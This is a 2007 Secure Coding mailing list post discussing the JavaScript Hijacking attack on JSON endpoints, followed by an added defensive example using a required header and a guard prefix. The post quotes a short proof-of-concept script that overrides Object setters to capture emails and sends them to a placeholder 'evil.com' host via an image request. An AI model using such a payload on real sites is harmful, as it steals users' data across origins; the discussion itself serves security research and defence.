Secure Coding mailing list archives

JavaScript Hijacking


From: stefano.dipaola at wisec.it (Stefano Di Paola)
Date: Tue, 03 Apr 2007 18:30:11 +0200

Hi Brian,
On Mon, 02/04/2007 at 12.13 -0700, Brian Chess wrote:
Hi Stefano,

Yes, we are aware of your paper, but we intentionally chose to omit the
reference because we are quite snobby.  I'm joking!

:DD lol

The difference between what you discuss and JavaScript Hijacking is that we
do not assume the presence of another defect.  JavaScript Hijacking does not
require the existence of a cross-site scripting vulnerability or the like.
It's a new attack technique (and a new vulnerable code pattern), not a new
method for exploiting an existing class of vulnerabilities.

Ok, I see the difference.
You are taking advantage of a pure JSON CSRF with an evil script which
contains a modified version of the Object prototype.
And when the callback function is executed you use an XMLHttpRequest in
order to send the information extracted by the instantiated object.

Well, I can see that you don't require an XSS vuln on a host, but you
assume a vulnerability on a user who has to click on a link :)

Anyway, if there's an HTML injection on a 3rd site you could use an
iframe with an evil page like the one you described without waiting for
a user to click on an untrusted link.

Or, if you can't use iframes, as XMLHttpRequest is restricted by the same
origin policy, you don't need an evil page since you could use an XSS-
vulnerable site as a vector in order to steal JSON information with an
img tag.
--
<script>
function Object(){
 this.email setter =  captureObject;
}
function captureObject(x){
(new Image()).src='http:// evil. com/ collect?email='+x;
}
</script>
<script src='http:// vuln /json.js' ></script>
--

But this is just another way to accomplish your attack.

BTW very nice paper!

Regards,
Stefano

Thanks,
Brian

-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................
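The defensive counterpart to the pattern discussed in this thread, as an added example that is not part of the original messages or of either author's work: a JSON endpoint that cannot be read through a cross-origin `<script src>` inclusion. It requires a request header that a script tag cannot attach (the header name is a convention assumed here) and prefixes the body with a fragment that makes the response a JavaScript syntax error, so the attacker's overridden setters are never reached. The request object and sample records are constructed for the example.

```javascript
// Added example, not code from the thread. Two independent defenses:
//  1. refuse requests lacking a custom header; an in-origin XMLHttpRequest
//     can set it, a cross-origin <script src> cannot;
//  2. prefix the body so it is a syntax error when loaded as a script,
//     while the legitimate caller strips the prefix before JSON.parse.
// Header name and prefix are conventions assumed here, not a standard.
const GUARD_PREFIX = ")]}',\n";
const REQUIRED_HEADER = "x-requested-with";

// Server side. `req` is a minimal constructed object { method, headers }
// standing in for a real HTTP request; header names are lower-cased.
function serveJson(req, data) {
  const hdr = (req.headers[REQUIRED_HEADER] || "").toLowerCase();
  if (hdr !== "xmlhttprequest") {
    return { status: 403, body: "" };
  }
  return { status: 200, body: GUARD_PREFIX + JSON.stringify(data) };
}

// Client side (same origin): strip the guard, then parse as data, never
// evaluate as code.
function parseGuardedJson(body) {
  if (!body.startsWith(GUARD_PREFIX)) throw new Error("missing guard prefix");
  return JSON.parse(body.slice(GUARD_PREFIX.length));
}

// Check used by the test: would this body run if loaded via <script src>?
// new Function() only compiles the text, it does not execute it. A bare
// JSON array is a valid program and therefore hijackable; the guarded
// body (and a bare object literal with quoted keys) is a syntax error.
function isExecutableAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false;
  }
}

// Constructed sample data in the shape of the thread's leaked records.
const records = [{ email: "alice@example.test" }];
```

As the thread itself points out, the header check only holds while the serving origin has no HTML injection: a script already running in that origin can set the header and read the response.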